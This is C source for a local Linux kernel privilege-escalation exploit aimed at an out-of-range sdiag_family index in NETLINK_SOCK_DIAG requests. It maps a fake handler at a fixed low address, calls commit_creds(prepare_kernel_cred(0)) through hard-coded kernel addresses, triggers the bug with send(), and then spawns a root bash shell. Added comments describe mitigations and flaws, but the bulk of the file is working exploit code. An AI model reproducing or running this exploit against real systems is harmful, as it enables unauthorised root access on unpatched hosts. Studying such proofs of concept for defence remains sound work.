/**
* SOCK_DIAG trigger
*/
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/inet_diag.h>
#include <sys/mman.h>
#include <assert.h>
//#include <linux/sock_diag.h>
//#include <linux/unix_diag.h>
//#include <linux/netlink.h>
#include "sock_diag.h"
#include "unix_diag.h"
#include "netlink.h"
/* Declared but never assigned or read in this file -- presumably leftovers
 * from an earlier version that located the kernel handler table; verify. */
unsigned long sock_diag_handlers, nl_table;
/* One netlink message: generic header followed by a unix_diag request body.
 * Sent as a single contiguous buffer (nlmsg_len is set to sizeof(req_t)). */
struct req_t {
struct nlmsghdr nlh;        /* netlink header: length, type, flags, seq */
struct unix_diag_req r;     /* SOCK_DIAG_BY_FAMILY payload */
};
/* Function-pointer shapes used to call two kernel symbols by raw address
 * (see privesc). The prototypes are approximations: the real kernel
 * functions take/return struct cred pointers, which are passed here as
 * unsigned long. */
typedef int (*commit_creds_fn)(unsigned long cred);
typedef unsigned long (*prepare_kernel_cred_fn)(unsigned long cred);
/*
 * Payload that main() installs as the `dump` member of a fake handler
 * struct; it is meant to run in kernel context if the kernel calls through
 * that pointer. It calls commit_creds(prepare_kernel_cred(0)) via two
 * hard-coded addresses.
 *
 * Both addresses are fixed kernel symbol locations taken from one specific
 * kernel build, so the code is not portable across builds; kernel address
 * randomisation (KASLR) is the mitigation that invalidates this kind of
 * static addressing. No return value and no parameters.
 */
void privesc() {
commit_creds_fn commit_creds = (commit_creds_fn)0xffffffff8107ee30;
prepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)0xffffffff8107f0c0;
commit_creds(prepare_kernel_cred(0)); /* prepare_kernel_cred(0): kernel-level creds; commit applies them to the current task */
}
/*
 * Proof-of-concept driver for an out-of-range sdiag_family value in a
 * NETLINK_SOCK_DIAG request.
 *
 * Sequence as written: open a NETLINK_SOCK_DIAG socket, build a
 * SOCK_DIAG_BY_FAMILY request whose sdiag_family (45) is not a valid
 * address family, map a page at a fixed low user address and copy a fake
 * `struct sock_diag_handler` there, then send the request. The program
 * expects the kernel to treat the bogus family as an index that lands on
 * the user mapping and to call the fake handler's dump pointer (privesc).
 *
 * Defender notes: a kernel that bounds-checks sdiag_family against the
 * valid family range rejects this request at the send() below, so the
 * only observable effect is an error return; the fixed-address mmap
 * depends on 0x1a000 being above vm.mmap_min_addr, and SMEP/SMAP-style
 * protections block the kernel from executing or reading user pages.
 * Returns the execl() result (only reached if every step succeeded).
 */
int main(int argc, char*argv[]) {
int fd;
struct req_t req;
/* NOTE: a failed socket() is only reported, not fatal; fd stays negative
 * and the later send() will fail with EBADF. */
if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
printf("Can't create sock diag socket\n");
}
memset(&req, 0, sizeof(req));
req.nlh.nlmsg_len = sizeof(req);
req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
req.nlh.nlmsg_seq = 123456;                 /* arbitrary sequence number */
req.r.sdiag_family = 45; // this is our "wild" index -> will point to 0x1ad38 (out of range for any real address family)
req.r.udiag_states = -1;                    /* all socket states */
req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;
// Create fake diag handler: a local mirror of the kernel's handler layout
// (family byte + dump function pointer); only `dump` is populated.
struct sock_diag_handler {
char family;
void (*dump)();
};
struct sock_diag_handler fake_struct = {0};
fake_struct.dump = privesc;
// Mmaping: map one page-aligned region at the address the bogus index is
// expected to resolve to. 7 = PROT_READ|PROT_WRITE|PROT_EXEC,
// 0x32 = MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED (Linux values).
unsigned int u32Address = 0x1ad38;
void* pCode = NULL;
/* NOTE: the mmap() call lives inside assert(), so it is compiled out under
 * -DNDEBUG; the same applies to the setuid() check near the end. */
assert((pCode = (void*)mmap((void*)(u32Address & 0xFFFFF000), 0x5000, 7, 0x32, 0, 0)) == (void*)(u32Address & 0xFFFFF000));
printf("[+] Shellcode at %lx, Mmap at : %lx\n", pCode+(u32Address & 0xFFF), u32Address & 0xFFFFF000);
/* Copies 0x100 bytes from a 16-byte struct: reads past fake_struct on the
 * stack (undefined behavior); the mapping itself is large enough. */
memcpy(pCode+(u32Address & 0xFFF), &fake_struct, 0x100);
//return;
getchar();                                  /* pause before sending */
// Trigger fd exploitation
if (send(fd, &req, sizeof(req), 0) < 0) {
printf("[-] Error\n");                      /* patched kernels fail here */
}
printf("[+] Triggered!\n");                 /* printed regardless of send() outcome */
getchar();
assert(!setuid(0));                         /* only succeeds if privesc() ran */
return execl("/bin/bash", "-sh", NULL);
}